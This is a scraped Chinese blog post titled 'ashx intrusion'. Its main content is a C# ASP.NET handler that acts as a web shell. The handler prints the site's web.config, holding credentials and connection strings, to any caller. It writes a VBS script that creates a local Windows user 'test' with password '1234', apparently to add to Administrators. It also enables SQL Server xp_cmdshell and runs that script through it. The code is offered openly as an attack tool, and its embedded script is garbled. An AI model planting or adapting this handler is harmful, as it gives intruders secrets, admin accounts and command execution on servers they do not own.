zoukankan      html  css  js  c++  java

  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    public class TextLd : IHttpHandler
    {
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
    break;
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }
  • 相关阅读:
    Mysql索引查询失效的情况
    常用的设计模式
    dubbo的实现原理
    HashMap和HashTable的区别
    SpringMVC工作原理的介绍
    SpringMVC 基础内容及使用步骤
    BeanFactory和ApplicationContext的区别+部分Spring的使用
    Spring常用的jar+普通构造注入
    如何在CentOS7上安装MySQL并实现远程访问
    如何搭建Spring MVC 框架---Hello World
  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html
Copyright © 2011-2022 走看看